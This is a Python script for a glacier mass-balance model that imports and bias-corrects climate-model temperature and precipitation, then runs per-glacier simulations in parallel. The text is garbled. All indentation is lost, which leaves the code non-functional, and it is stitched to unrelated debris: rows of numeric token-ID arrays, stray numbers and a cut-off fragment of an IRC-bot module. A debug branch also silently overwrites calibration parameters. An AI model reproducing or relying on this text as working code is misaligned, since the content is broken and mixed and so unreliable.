rcp_scenario = args.rcp
if debug:
if 'rcp_scenario' in locals():
print(rcp_scenario)
if args.debug_spc == 1:
debug_spc = True
else:
debug_spc = False
# ===== LOAD GLACIERS =====
main_glac_rgi = modelsetup.selectglaciersrgitable(glac_no=glac_no)
# Load glacier data for Huss and Farinotti to avoid repetitively reading the csv file (not needed for OGGM)
if input.hyps_data in ['Huss', 'Farinotti']:
# Glacier hypsometry [km**2], total area
main_glac_hyps = modelsetup.import_Husstable(main_glac_rgi, input.hyps_filepath, input.hyps_filedict,
input.hyps_colsdrop)
# Ice thickness [m], average
main_glac_icethickness = modelsetup.import_Husstable(main_glac_rgi, input.thickness_filepath,
input.thickness_filedict, input.thickness_colsdrop)
main_glac_icethickness[main_glac_icethickness < 0] = 0
main_glac_hyps[main_glac_icethickness == 0] = 0
# Width [km], average
main_glac_width = modelsetup.import_Husstable(main_glac_rgi, input.width_filepath, input.width_filedict,
input.width_colsdrop)
# if input.option_surfacetype_debris == 1:
# main_glac_debrisfactor = modelsetup.import_Husstable(main_glac_rgi, input.debris_fp, input.debris_filedict,
# input.debris_colsdrop)
# else:
# print('\n\nDELETE ME - CHECK THAT THIS IS SAME FORMAT AS MAIN_GLAC_HYPS AND OTHERS\n\n')
# main_glac_debrisfactor = np.zeros(main_glac_hyps.shape) + 1
# main_glac_debrisfactor[main_glac_hyps == 0] = 0
# ===== TIME PERIOD =====
dates_table = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
spinupyears=input.gcm_spinupyears, option_wateryear=input.gcm_wateryear)
# # =================
# if debug:
# # Select dates including future projections
# # - nospinup dates_table needed to get the proper time indices
# dates_table_nospinup = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
# spinupyears=0, option_wateryear=input.gcm_wateryear)
#
# # ===== LOAD CALIBRATION DATA =====
# cal_data = pd.DataFrame()
# for dataset in input.cal_datasets:
# cal_subset = class_mbdata.MBData(name=dataset)
# cal_subset_data = cal_subset.retrieve_mb(main_glac_rgi, main_glac_hyps, dates_table_nospinup)
# cal_data = cal_data.append(cal_subset_data, ignore_index=True)
# cal_data = cal_data.sort_values(['glacno', 't1_idx'])
# cal_data.reset_index(drop=True, inplace=True)
# # =================
# ===== LOAD CLIMATE DATA =====
# Set up climate class
if gcm_name in ['ERA5', 'ERA-Interim', 'COAWST']:
gcm = class_climate.GCM(name=gcm_name)
# Check that end year is reasonable
if (input.gcm_endyear > int(time.strftime("%Y"))) and (input.option_synthetic_sim == 0):
print('\n\nEND YEAR BEYOND AVAILABLE DATA FOR ERA-INTERIM. CHANGE END YEAR.\n\n')
else:
# GCM object
gcm = class_climate.GCM(name=gcm_name, rcp_scenario=rcp_scenario)
# Reference GCM
ref_gcm = class_climate.GCM(name=input.ref_gcm_name)
# Adjust reference dates in event that reference is longer than GCM data
if input.ref_startyear >= input.gcm_startyear:
ref_startyear = input.ref_startyear
else:
ref_startyear = input.gcm_startyear
if input.ref_endyear <= input.gcm_endyear:
ref_endyear = input.ref_endyear
else:
ref_endyear = input.gcm_endyear
dates_table_ref = modelsetup.datesmodelrun(startyear=ref_startyear, endyear=ref_endyear,
spinupyears=input.spinupyears,
option_wateryear=input.ref_wateryear)
# Load climate data
if input.option_synthetic_sim == 0:
# Air temperature [degC]
gcm_temp, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table)
if input.option_ablation != 2:
gcm_tempstd = np.zeros(gcm_temp.shape)
elif input.option_ablation == 2 and gcm_name in ['ERA5']:
gcm_tempstd, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.tempstd_fn, gcm.tempstd_vn,
main_glac_rgi, dates_table)
elif input.option_ablation == 2 and input.ref_gcm_name in ['ERA5']:
# Compute temp std based on reference climate data
ref_tempstd, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.tempstd_fn, ref_gcm.tempstd_vn,
main_glac_rgi, dates_table_ref)
# Monthly average from reference climate data
gcm_tempstd = gcmbiasadj.monthly_avg_array_rolled(ref_tempstd, dates_table_ref, dates_table)
else:
gcm_tempstd = np.zeros(gcm_temp.shape)
# Precipitation [m]
gcm_prec, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
if gcm_name in ['ERA-Interim', 'ERA5']:
gcm_lr, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi, dates_table)
else:
# Compute lapse rates based on reference climate data
ref_lr, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.lr_fn, ref_gcm.lr_vn, main_glac_rgi,
dates_table_ref)
# Monthly average from reference climate data
gcm_lr = gcmbiasadj.monthly_avg_array_rolled(ref_lr, dates_table_ref, dates_table)
# COAWST data has two domains, so need to merge the two domains
if gcm_name == 'COAWST':
gcm_temp_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn_d01, gcm.temp_vn,
main_glac_rgi, dates_table)
gcm_prec_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn_d01, gcm.prec_vn,
main_glac_rgi, dates_table)
gcm_elev_d01 = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn_d01, gcm.elev_vn, main_glac_rgi)
# Check if glacier outside of high-res (d02) domain
for glac in range(main_glac_rgi.shape[0]):
glac_lat = main_glac_rgi.loc[glac,input.rgi_lat_colname]
glac_lon = main_glac_rgi.loc[glac,input.rgi_lon_colname]
if (~(input.coawst_d02_lat_min <= glac_lat <= input.coawst_d02_lat_max) or
~(input.coawst_d02_lon_min <= glac_lon <= input.coawst_d02_lon_max)):
gcm_prec[glac,:] = gcm_prec_d01[glac,:]
gcm_temp[glac,:] = gcm_temp_d01[glac,:]
gcm_elev[glac] = gcm_elev_d01[glac]
# ===== Synthetic Simulation =====
elif input.option_synthetic_sim == 1:
# Synthetic dates table
dates_table_synthetic = modelsetup.datesmodelrun(
startyear=input.synthetic_startyear, endyear=input.synthetic_endyear,
option_wateryear=input.gcm_wateryear, spinupyears=0)
# Air temperature [degC]
gcm_temp_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table_synthetic)
# Precipitation [m]
gcm_prec_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table_synthetic)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
gcm_lr_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi,
dates_table_synthetic)
# Future simulation based on synthetic (replicated) data; add spinup years; dataset restarts after spinupyears
datelength = dates_table.shape[0] - input.gcm_spinupyears * 12
n_tiles = int(np.ceil(datelength / dates_table_synthetic.shape[0]))
gcm_temp = np.append(gcm_temp_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_temp_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_prec = np.append(gcm_prec_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_prec_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_lr = np.append(gcm_lr_tile[:,:input.gcm_spinupyears*12], np.tile(gcm_lr_tile,(1,n_tiles))[:,:datelength],
axis=1)
# Temperature and precipitation sensitivity adjustments
gcm_temp = gcm_temp + input.synthetic_temp_adjust
gcm_prec = gcm_prec * input.synthetic_prec_factor
# ===== BIAS CORRECTIONS =====
# No adjustments
if input.option_bias_adjustment == 0 or gcm_name == input.ref_gcm_name:
gcm_temp_adj = gcm_temp
gcm_prec_adj = gcm_prec
gcm_elev_adj = gcm_elev
# Bias correct based on reference climate data
else:
# Air temperature [degC], Precipitation [m], Elevation [masl], Lapse rate [K m-1]
ref_temp, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.temp_fn, ref_gcm.temp_vn,
main_glac_rgi, dates_table_ref)
ref_prec, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.prec_fn, ref_gcm.prec_vn,
main_glac_rgi, dates_table_ref)
ref_elev = ref_gcm.importGCMfxnearestneighbor_xarray(ref_gcm.elev_fn, ref_gcm.elev_vn, main_glac_rgi)
# OPTION 1: Adjust temp using Huss and Hock (2015), prec similar but addresses for variance and outliers
if input.option_bias_adjustment == 1:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_opt1(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# OPTION 2: Adjust temp and prec using Huss and Hock (2015)
elif input.option_bias_adjustment == 2:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_HH2015(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# Checks on precipitation data
assert gcm_prec_adj.max() <= 10, 'gcm_prec_adj (precipitation bias adjustment) too high, needs to be modified'
assert gcm_prec_adj.min() >= 0, 'gcm_prec_adj is producing a negative precipitation value'
# ===== RUN MASS BALANCE =====
# Number of simulations
if input.option_calibration == 2:
sim_iters = input.sim_iters
else:
sim_iters = 1
# # Create datasets to store simulations
# output_ds_all, encoding = create_xrdataset(main_glac_rgi, dates_table, sim_iters=sim_iters,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats, encoding = create_xrdataset(main_glac_rgi, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
for glac in range(main_glac_rgi.shape[0]):
if glac == 0 or glac == main_glac_rgi.shape[0]:
print(gcm_name,':', main_glac_rgi.loc[main_glac_rgi.index.values[glac],'RGIId'])
# Select subsets of data
glacier_rgi_table = main_glac_rgi.loc[main_glac_rgi.index.values[glac], :]
glacier_str = '{0:0.5f}'.format(glacier_rgi_table['RGIId_float'])
glacier_gcm_elev = gcm_elev_adj[glac]
glacier_gcm_prec = gcm_prec_adj[glac,:]
glacier_gcm_temp = gcm_temp_adj[glac,:]
glacier_gcm_tempstd = gcm_tempstd[glac,:]
glacier_gcm_lrgcm = gcm_lr[glac,:]
glacier_gcm_lrglac = glacier_gcm_lrgcm.copy()
# ===== Load glacier data: area (km2), ice thickness (m), width (km) =====
if input.hyps_data in ['oggm']:
glac_oggm_df = pd.read_csv(input.oggm_glacierdata_fp + 'RGI60-' + glacier_str + '.csv', index_col=0)
glacier_area_initial = glac_oggm_df['w'].values * glac_oggm_df['dx'].values / 1e6
icethickness_initial = glac_oggm_df['h'].values
width_initial = glac_oggm_df['w'].values / 1e3
elev_bins = glac_oggm_df['z'].values
elif input.hyps_data in ['Huss', 'Farinotti']:
glacier_area_initial = main_glac_hyps.iloc[glac,:].values.astype(float)
icethickness_initial = main_glac_icethickness.iloc[glac,:].values.astype(float)
width_initial = main_glac_width.iloc[glac,:].values.astype(float)
elev_bins = main_glac_hyps.columns.values.astype(int)
# if input.option_surfacetype_debris == 1:
# glacier_debrisfactor = main_glac_debrisfactor.iloc[glac,:].values.astype(float)
# # Empty datasets to record output
# annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
# year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
# year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
# np.array([annual_columns[annual_columns.shape[0]-1]+1])))
# output_temp_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_prec_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_acc_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_refreeze_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_melt_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_frontalablation_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_massbaltotal_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_runoff_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_snowline_glac_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_area_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_volume_glac_annual = np.zeros((year_plus1_values.shape[0], sim_iters))
# output_ELA_glac_annual = np.zeros((year_values.shape[0], sim_iters))
# output_offglac_prec_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_refreeze_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_melt_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_snowpack_monthly = np.zeros((dates_table.shape[0], sim_iters))
# output_offglac_runoff_monthly = np.zeros((dates_table.shape[0], sim_iters))
if icethickness_initial.max() > 0:
if input.hindcast == 1:
glacier_gcm_prec = glacier_gcm_prec[::-1]
glacier_gcm_temp = glacier_gcm_temp[::-1]
glacier_gcm_lrgcm = glacier_gcm_lrgcm[::-1]
glacier_gcm_lrglac = glacier_gcm_lrglac[::-1]
# # get glacier number
# if glacier_rgi_table.O1Region >= 10:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][6:]
# else:
# glacier_RGIId = main_glac_rgi.iloc[glac]['RGIId'][7:]
if input.option_import_modelparams == 1:
ds_mp = xr.open_dataset(input.modelparams_fp + glacier_str + '.nc')
cn_subset = input.modelparams_colnames
modelparameters_all = (pd.DataFrame(ds_mp['mp_value'].sel(chain=0).values,
columns=ds_mp.mp.values)[cn_subset])
else:
modelparameters_all = (
pd.DataFrame(np.asarray([input.lrgcm, input.lrglac, input.precfactor, input.precgrad,
input.ddfsnow, input.ddfice, input.tempsnow, input.tempchange])
.reshape(1,-1), columns=input.modelparams_colnames))
# Set the number of iterations and determine every kth iteration to use for the ensemble
if input.option_calibration == 2 and modelparameters_all.shape[0] > 1:
sim_iters = input.sim_iters
# Select every kth iteration
mp_spacing = int((modelparameters_all.shape[0] - input.sim_burn) / sim_iters)
mp_idx_start = np.arange(input.sim_burn, input.sim_burn + mp_spacing)
np.random.shuffle(mp_idx_start)
mp_idx_start = mp_idx_start[0]
mp_idx_all = np.arange(mp_idx_start, modelparameters_all.shape[0], mp_spacing)
else:
sim_iters = 1
# Loop through model parameters
for n_iter in range(sim_iters):
if sim_iters == 1:
modelparameters = modelparameters_all.mean()
else:
mp_idx = mp_idx_all[n_iter]
modelparameters = modelparameters_all.iloc[mp_idx,:]
if debug:
print(glacier_str, ('PF: ' + str(np.round(modelparameters[2],2)) + ' ddfsnow: ' +
str(np.round(modelparameters[4],4)) + ' tbias: ' + str(np.round(modelparameters[7],2))))
print('\n\nDELETE ME! Switch back model parameters\n\n')
modelparameters[2] = 5
modelparameters[7] = -5
print('model params:', modelparameters)
# run mass balance calculation
(glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
glac_bin_frontalablation, glac_bin_massbalclim, glac_bin_massbalclim_annual, glac_bin_area_annual,
glac_bin_icethickness_annual, glac_bin_width_annual, glac_bin_surfacetype_annual,
glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline, glac_wide_snowpack,
glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual, offglac_wide_prec,
offglac_wide_refreeze, offglac_wide_melt, offglac_wide_snowpack, offglac_wide_runoff) = (
massbalance.runmassbalance(modelparameters[0:8], glacier_rgi_table, glacier_area_initial,
icethickness_initial, width_initial, elev_bins, glacier_gcm_temp,
glacier_gcm_tempstd, glacier_gcm_prec, glacier_gcm_elev,
glacier_gcm_lrgcm, glacier_gcm_lrglac, dates_table,
option_areaconstant=0, hindcast=input.hindcast,
debug=input.debug_mb, debug_refreeze=input.debug_refreeze))
if input.hindcast == 1:
glac_bin_temp = glac_bin_temp[:,::-1]
glac_bin_prec = glac_bin_prec[:,::-1]
glac_bin_acc = glac_bin_acc[:,::-1]
glac_bin_refreeze = glac_bin_refreeze[:,::-1]
glac_bin_snowpack = glac_bin_snowpack[:,::-1]
glac_bin_melt = glac_bin_melt[:,::-1]
glac_bin_frontalablation = glac_bin_frontalablation[:,::-1]
glac_bin_massbalclim = glac_bin_massbalclim[:,::-1]
glac_bin_massbalclim_annual = glac_bin_massbalclim_annual[:,::-1]
glac_bin_area_annual = glac_bin_area_annual[:,::-1]
glac_bin_icethickness_annual = glac_bin_icethickness_annual[:,::-1]
glac_bin_width_annual = glac_bin_width_annual[:,::-1]
glac_bin_surfacetype_annual = glac_bin_surfacetype_annual[:,::-1]
glac_wide_massbaltotal = glac_wide_massbaltotal[::-1]
glac_wide_runoff = glac_wide_runoff[::-1]
glac_wide_snowline = glac_wide_snowline[::-1]
glac_wide_snowpack = glac_wide_snowpack[::-1]
glac_wide_area_annual = glac_wide_area_annual[::-1]
glac_wide_volume_annual = glac_wide_volume_annual[::-1]
glac_wide_ELA_annual = glac_wide_ELA_annual[::-1]
offglac_wide_prec = offglac_wide_prec[::-1]
offglac_wide_refreeze = offglac_wide_refreeze[::-1]
offglac_wide_melt = offglac_wide_melt[::-1]
offglac_wide_snowpack = offglac_wide_snowpack[::-1]
offglac_wide_runoff = offglac_wide_runoff[::-1]
# # RECORD PARAMETERS TO DATASET
# if input.output_package == 2:
# (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
# glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
# glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual) = (
# convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc,
# glac_bin_refreeze, glac_bin_snowpack, glac_bin_melt,
# glac_bin_frontalablation, glac_bin_massbalclim_annual,
# glac_bin_area_annual, glac_bin_icethickness_annual))
#
# if debug:
# # Compute glacier volume change for every time step and use this to compute mass balance
# # this will work for any indexing
# glac_wide_area = glac_wide_area_annual[:-1].repeat(12)
# # Mass change [km3 mwe]
# # mb [mwea] * (1 km / 1000 m) * area [km2]
# glac_wide_masschange = glac_wide_massbaltotal / 1000 * glac_wide_area
# # Mean annual mass balance [mwea]
# # note: used annual shape - 1 because area and volume have "n+1 years" t0 account for initial
# # and final
# mb_mwea = (glac_wide_masschange.sum() / glac_wide_area[0] * 1000 /
# (glac_wide_area_annual.shape[0]-1))
# print(' mb_model [mwea]:', mb_mwea.round(3))
#
# # Record output to xarray dataset
# output_temp_glac_monthly[:, n_iter] = glac_wide_temp
# output_prec_glac_monthly[:, n_iter] = glac_wide_prec
# output_acc_glac_monthly[:, n_iter] = glac_wide_acc
# output_refreeze_glac_monthly[:, n_iter] = glac_wide_refreeze
# output_melt_glac_monthly[:, n_iter] = glac_wide_melt
# output_frontalablation_glac_monthly[:, n_iter] = glac_wide_frontalablation
# output_massbaltotal_glac_monthly[:, n_iter] = glac_wide_massbaltotal
# output_runoff_glac_monthly[:, n_iter] = glac_wide_runoff
# output_snowline_glac_monthly[:, n_iter] = glac_wide_snowline
# output_area_glac_annual[:, n_iter] = glac_wide_area_annual
# output_volume_glac_annual[:, n_iter] = glac_wide_volume_annual
# output_ELA_glac_annual[:, n_iter] = glac_wide_ELA_annual
# output_offglac_prec_monthly[:, n_iter] = offglac_wide_prec
# output_offglac_refreeze_monthly[:, n_iter] = offglac_wide_refreeze
# output_offglac_melt_monthly[:, n_iter] = offglac_wide_melt
# output_offglac_snowpack_monthly[:, n_iter] = offglac_wide_snowpack
# output_offglac_runoff_monthly[:, n_iter] = offglac_wide_runoff
#
# if debug:
# print(' years:', glac_wide_volume_annual.shape[0]-1)
# print(' vol start/end:', np.round(glac_wide_volume_annual[0],2), '/',
# np.round(glac_wide_volume_annual[-1],2))
# print(' area start/end:', np.round(glac_wide_area_annual[0],2), '/',
# np.round(glac_wide_area_annual[-1],2))
# print(' volume:', glac_wide_volume_annual)
# # print('glac runoff max:', np.round(glac_wide_runoff.max(),0),
# # 'glac prec max:', np.round(glac_wide_prec.max(),2),
# # 'glac refr max:', np.round(glac_wide_refreeze.max(),2),
# # 'offglac ref max:', np.round(offglac_wide_refreeze.max(),2))
#
# # ===== Export Results =====
# rgi_table_ds = pd.DataFrame(np.zeros((1,glacier_rgi_table.shape[0])), columns=glacier_rgi_table.index)
# rgi_table_ds.iloc[0,:] = glacier_rgi_table.values
# output_ds_all_stats, encoding = create_xrdataset(rgi_table_ds, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats['temp_glac_monthly'].values[0,:,:] = calc_stats_array(output_temp_glac_monthly)
# output_ds_all_stats['prec_glac_monthly'].values[0,:,:] = calc_stats_array(output_prec_glac_monthly)
# output_ds_all_stats['acc_glac_monthly'].values[0,:,:] = calc_stats_array(output_acc_glac_monthly)
# output_ds_all_stats['refreeze_glac_monthly'].values[0,:,:] = calc_stats_array(output_refreeze_glac_monthly)
# output_ds_all_stats['melt_glac_monthly'].values[0,:,:] = calc_stats_array(output_melt_glac_monthly)
# output_ds_all_stats['frontalablation_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_frontalablation_glac_monthly))
# output_ds_all_stats['massbaltotal_glac_monthly'].values[0,:,:] = (
# calc_stats_array(output_massbaltotal_glac_monthly))
# output_ds_all_stats['runoff_glac_monthly'].values[0,:,:] = calc_stats_array(output_runoff_glac_monthly)
# output_ds_all_stats['snowline_glac_monthly'].values[0,:,:] = calc_stats_array(output_snowline_glac_monthly)
# output_ds_all_stats['area_glac_annual'].values[0,:,:] = calc_stats_array(output_area_glac_annual)
# output_ds_all_stats['volume_glac_annual'].values[0,:,:] = calc_stats_array(output_volume_glac_annual)
# output_ds_all_stats['ELA_glac_annual'].values[0,:,:] = calc_stats_array(output_ELA_glac_annual)
# output_ds_all_stats['offglac_prec_monthly'].values[0,:,:] = calc_stats_array(output_offglac_prec_monthly)
# output_ds_all_stats['offglac_melt_monthly'].values[0,:,:] = calc_stats_array(output_offglac_melt_monthly)
# output_ds_all_stats['offglac_refreeze_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_refreeze_monthly))
# output_ds_all_stats['offglac_snowpack_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_snowpack_monthly))
# output_ds_all_stats['offglac_runoff_monthly'].values[0,:,:] = (
# calc_stats_array(output_offglac_runoff_monthly))
#
# # Export statistics to netcdf
# if input.output_package == 2:
# output_sim_fp = input.output_sim_fp + gcm_name + '/'
# if gcm_name not in ['ERA-Interim', 'ERA5', 'COAWST']:
# output_sim_fp += rcp_scenario + '/'
# # Create filepath if it does not exist
# if os.path.exists(output_sim_fp) == False:
# os.makedirs(output_sim_fp)
# # Netcdf filename
# if gcm_name in ['ERA-Interim', 'ERA5', 'COAWST']:
# # Filename
# netcdf_fn = (glacier_str + '_' + gcm_name + '_c' + str(input.option_calibration) + '_ba' +
# str(input.option_bias_adjustment) + '_' + str(sim_iters) + 'sets' + '_' +
# str(input.gcm_startyear) + '_' + str(input.gcm_endyear) + '.nc')
# else:
# netcdf_fn = (glacier_str + '_' + gcm_name + '_' + rcp_scenario + '_c' +
# str(input.option_calibration) + '_ba' + str(input.option_bias_adjustment) + '_' +
# str(sim_iters) + 'sets' + '_' + str(input.gcm_startyear) + '_' + str(input.gcm_endyear)
# + '.nc')
# if input.option_synthetic_sim==1:
# netcdf_fn = (netcdf_fn.split('--')[0] + '_T' + str(input.synthetic_temp_adjust) + '_P' +
# str(input.synthetic_prec_factor) + '--' + netcdf_fn.split('--')[1])
# # Export netcdf
# output_ds_all_stats.to_netcdf(output_sim_fp + netcdf_fn, encoding=encoding)
#
# # Close datasets
# output_ds_all_stats.close()
#
#
# if debug_spc:
# os.remove(debug_fp + debug_rgiid_fn)
# Global variables for Spyder development
if args.option_parallels == 0:
global main_vars
main_vars = inspect.currentframe().f_locals
#%% PARALLEL PROCESSING
if __name__ == '__main__':
time_start = time.time()
parser = getparser()
args = parser.parse_args()
if args.debug == 1:
debug = True
else:
debug = False
# RGI glacier number
if args.rgi_glac_number_fn is not None:
with open(args.rgi_glac_number_fn, 'rb') as f:
glac_no = pickle.load(f)
elif input.glac_no is not None:
glac_no = input.glac_no
else:
main_glac_rgi_all = modelsetup.selectglaciersrgitable(
rgi_regionsO1=input.rgi_regionsO1, rgi_regionsO2 =input.rgi_regionsO2,
rgi_glac_number=input.rgi_glac_number)
glac_no = list(main_glac_rgi_all['rgino_str'].values)
# Regions
regions_str = 'R'
for region in sorted(set([x.split('.')[0] for x in glac_no])):
regions_str += str(region)
# Number of cores for parallel processing
if args.option_parallels != 0:
num_cores = int(np.min([len(glac_no), args.num_simultaneous_processes]))
else:
num_cores = 1
# Glacier number lists to pass for parallel processing
glac_no_lsts = split_glaciers.split_list(glac_no, n=num_cores, option_ordered=args.option_ordered)
# Read GCM names from argument parser
gcm_name = args.gcm_list_fn
if args.gcm_name is not None:
gcm_list = [args.gcm_name]
rcp_scenario = args.rcp
elif args.gcm_list_fn == input.ref_gcm_name:
gcm_list = [input.ref_gcm_name]
rcp_scenario = args.rcp
else:
with open(args.gcm_list_fn, 'r') as gcm_fn:
gcm_list = gcm_fn.read().splitlines()
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
print('Found %d gcms to process'%(len(gcm_list)))
# Loop through all GCMs
for gcm_name in gcm_list:
if args.rcp is None:
print('Processing:', gcm_name)
else:
print('Processing:', gcm_name, rcp_scenario)
# Pack variables for multiprocessing
list_packed_vars = []
for count, glac_no_lst in enumerate(glac_no_lsts):
list_packed_vars.append([count, glac_no_lst, regions_str, gcm_name])
# Parallel processing
if args.option_parallels != 0:
print('Processing in parallel with ' + str(args.num_simultaneous_processes) + ' cores...')
with multiprocessing.Pool(args.num_simultaneous_processes) as p:
p.map(main,list_packed_vars)
# If not in parallel, then only should be one loop
else:
# Loop through the chunks and export bias adjustments
for n in range(len(list_packed_vars)):
main(list_packed_vars[n])
print('Total processing time:', time.time()-time_start, 's')
#%% ===== PLOTTING AND PROCESSING FOR MODEL DEVELOPMENT =====
# Place local variables in variable explorer
if args.option_parallels == 0:
main_vars_list = list(main_vars.keys())
gcm_name = main_vars['gcm_name']
main_glac_rgi = main_vars['main_glac_rgi']
# main_glac_hyps = main_vars['main_glac_hyps']
# main_glac_icethickness = main_vars['main_glac_icethickness']
# main_glac_width = main_vars['main_glac_width']
dates_table = main_vars['dates_table']
if input.option_synthetic_sim == 1:
dates_table_synthetic = main_vars['dates_table_synthetic']
gcm_temp_tile = main_vars['gcm_temp_tile']
gcm_prec_tile = main_vars['gcm_prec_tile']
gcm_lr_tile = main_vars['gcm_lr_tile']
gcm_temp = main_vars['gcm_temp']
gcm_tempstd = main_vars['gcm_tempstd']
gcm_prec = main_vars['gcm_prec']
gcm_elev = main_vars['gcm_elev']
gcm_lr = main_vars['gcm_lr']
gcm_temp_adj = main_vars['gcm_temp_adj']
gcm_prec_adj = main_vars['gcm_prec_adj']
gcm_elev_adj = main_vars['gcm_elev_adj']
gcm_temp_lrglac = main_vars['gcm_lr']
# output_ds_all_stats = main_vars['output_ds_all_stats']
# modelparameters = main_vars['modelparameters']
glacier_rgi_table = main_vars['glacier_rgi_table']
glacier_str = main_vars['glacier_str']
glac_oggm_df = main_vars['glac_oggm_df']
glacier_gcm_temp = main_vars['glacier_gcm_temp']
glacier_gcm_tempstd = main_vars['glacier_gcm_tempstd']
glacier_gcm_prec = main_vars['glacier_gcm_prec']
glacier_gcm_elev = main_vars['glacier_gcm_elev']
glacier_gcm_lrgcm = main_vars['glacier_gcm_lrgcm']
glacier_gcm_lrglac = glacier_gcm_lrgcm
glacier_area_initial = main_vars['glacier_area_initial']
icethickness_initial = main_vars['icethickness_initial']
width_initial = main_vars['width_initial']
elev_bins = main_vars['elev_bins']
glac_bin_frontalablation = main_vars['glac_bin_frontalablation']
glac_bin_area_annual = main_vars['glac_bin_area_annual']
glac_bin_massbalclim_annual = main_vars['glac_bin_massbalclim_annual']
glac_bin_melt = main_vars['glac_bin_melt']
glac_bin_acc = main_vars['glac_bin_acc']
glac_bin_refreeze = main_vars['glac_bin_refreeze']
glac_bin_snowpack = main_vars['glac_bin_snowpack']
glac_bin_temp = main_vars['glac_bin_temp']
glac_bin_prec = main_vars['glac_bin_prec']
glac_bin_massbalclim = main_vars['glac_bin_massbalclim']
glac_wide_massbaltotal = main_vars['glac_wide_massbaltotal']
glac_wide_area_annual = main_vars['glac_wide_area_annual']
glac_wide_volume_annual = main_vars['glac_wide_volume_annual']
glac_wide_runoff = main_vars['glac_wide_runoff']
# glac_wide_prec = main_vars['glac_wide_prec']
# glac_wide_refreeze = main_vars['glac_wide_refreeze']
modelparameters_all = main_vars['modelparameters_all']
sim_iters = main_vars['sim_iters']
| [
37811,
10987,
257,
2746,
18640,
526,
15931,
201,
198,
2,
15161,
4258,
1366,
318,
18802,
12,
9492,
320,
26,
11986,
16477,
4061,
20,
416,
31577,
257,
29472,
284,
262,
4578,
25,
201,
198,
2,
220,
220,
220,
357,
21575,
1627,
8,
21015,
1... | 1.921429 | 34,020 |
# coding=utf8
from __future__ import unicode_literals, absolute_import, division, print_function
from sopel_modules.spicemanip import spicemanip
import re
from num2words import num2words
translate = Translate()
| [
2,
19617,
28,
40477,
23,
